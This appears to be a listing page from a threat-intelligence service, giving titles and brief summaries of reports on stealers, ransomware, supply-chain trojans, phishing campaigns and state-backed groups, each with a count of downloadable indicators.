All attack reports
Kematian-Stealer: A Deep Dive into a New Information Stealer
This report provides an in-depth analysis of a newly discovered information stealer named Kematian-Stealer, actively developed on GitHub and distributed as open-source software. The malware employs various techniques to collect sensitive data from compromised systems, evade detection, and maintain …
Downloadable IOCs 4
VayGren and Mr.Burns: Strong Ties in Finance
F.A.C.C.T experts analyzed the tools and connections of cybercriminals attacking Russian accountants. An analysis of the infection chain of the VasyGrek attacker, his forum activity and connection with the malware developer Mr.Burns is presented. The history of Mr.Burns, starting in 2010, is given,…
Downloadable IOCs 131
How do cryptocurrency drainer phishing scams work?
Cryptodrainer phishing scams have emerged as a significant threat, targeting unsuspecting individuals through deceptive tactics to steal their digital assets. These scams lure victims with promises of profits while covertly siphoning their cryptocurrency. Attackers employ social engineering techniq…
Downloadable IOCs 14
Persistent npm Campaign Shipping Trojanized jQuery
The report describes a persistent supply chain attack involving the distribution of a trojanized version of jQuery through various platforms like npm and GitHub. The malicious jQuery variant, containing a modified 'end' function, exfiltrates website form data by sending it to remote URLs controlled…
Downloadable IOCs 67
Decrypted: DoNex Ransomware and its Predecessors
Researchers have uncovered a cryptographic flaw in the DoNex ransomware and its previous iterations, allowing for the creation of a decryptor tool. Initially discovered in March 2024, this cryptographic weakness was made public at Recon 2024. The ransomware, which has undergone several rebrands sin…
Downloadable IOCs 8
Ticket Heist: Olympic Games and Sporting Events at Risk
This analysis examines an ongoing, undetected fraudulent campaign named 'Ticket Heist' targeting Russian-speaking users, several Eastern European countries, and English-speaking individuals seeking tickets for various sporting events and festivals. The campaign involves a network of 708 fraudulent …
Downloadable IOCs 685
Resurrecting Internet Explorer: Threat Actors Using Zero-day Tricks in Internet Shortcut File to Lure Victims (CVE-2024-38112)
Check Point Research discovered threat actors leveraging novel techniques to execute malicious code on Windows systems by exploiting Internet Explorer's vulnerabilities. The attackers utilized specially crafted .url files that, when opened, would launch IE and visit attacker-controlled URLs. Additi…
Downloadable IOCs 7
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
People's Republic of China (PRC) Ministry of State Security APT40 Tradecraft in Action
This advisory outlines the tactics, techniques, and procedures employed by the state-sponsored cyber group APT40, also known as Kryptonite Panda, GINGHAM TYPHOON, Leviathan, and Bronze Mohawk. The group, believed to be associated with the People's Republic of China's Ministry of State Security, has…
Downloadable IOCs 0
M365 adversary-in-the-middle campaign
Field Effect researchers uncovered a previously unreported campaign leveraging the Axios user agent string to facilitate business email compromise (BEC) attacks against Microsoft 365 (M365) accounts. The threat actor utilized malicious domains impersonating M365 login pages to harvest victims' cred…
Downloadable IOCs 19
CloudSorcerer – A new APT targeting Russian government entities
In May 2024, Kaspersky discovered a sophisticated cyberespionage tool called CloudSorcerer, targeting Russian government entities. This malware leverages cloud resources like Microsoft Graph, Yandex Cloud, and Dropbox as command-and-control (C2) servers, accessing them through APIs using authentica…
Downloadable IOCs 1
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7